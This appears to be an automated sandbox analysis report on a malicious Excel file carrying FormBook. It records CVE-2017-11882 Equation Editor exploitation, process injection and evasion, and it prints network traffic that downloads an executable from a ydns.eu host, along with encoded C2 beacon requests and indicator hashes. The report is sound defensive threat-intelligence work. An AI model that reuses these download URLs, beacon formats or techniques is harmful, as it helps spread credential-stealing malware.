Analysis Report PI202009255687.xlsx

Overview

General Information

Sample Name: PI202009255687.xlsx
Analysis ID: 323042
MD5: d7c0c12c1cdf36e9f97f96cb3fe16ae0
SHA1: e73e8bd48f5ef68747de444e44d59745cb75b08a
SHA256: 76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
Tags: FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: PI202009255687.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 6_2_0040E451
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_0007E451
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49168
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 08:00:28 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 25 Nov 2020 21:20:21 GMTETag: "61800-5b4f4feb1ea84"Accept-Ranges: bytesContent-Length: 399360Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea aa c2 b4 ae cb ac e7 ae cb ac e7 ae cb ac e7 b0 99 28 e7 b4 cb ac e7 b0 99 39 e7 be cb ac e7 89 0d d7 e7 bf cb ac e7 ae cb ad e7 d8 cb ac e7 b0 99 2f e7 e7 cb ac e7 b0 99 38 e7 af cb ac e7 b0 99 3d e7 af cb ac e7 52 69 63 68 ae cb ac e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 ca be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 f6 04 00 00 00 00 00 97 35 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 06 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 b4 00 00 00 00 a0 04 00 a8 89 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 d0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 5c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 29 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 2b 00 00 00 40 01 00 00 2c 00 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 28 03 00 00 70 01 00 00 1e 03 00 00 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 89 01 00 00 a0 04 00 00 8a 01 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c2 14 00 00 00 30 06 00 00 16 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.lygosfilms.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.paletciniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.annaothomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.138.53 160.153.138.53
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.lygosfilms.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.paletciniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1Host: www.annaothomas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: text/html; charset=UTF-8X-Cacheable: YES:ForcedTransfer-Encoding: chunkedDate: Thu, 26 Nov 2020 08:01:45 GMTAge: 0Connection: closeVary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 30 30 37 65 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 2f 31 36 30 2e 31 35 33 2e 31 33 38 2e 35 33 2f 6f 76 7a 2e 64 30 33 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 6
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://gmpg.org/xfn/11
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
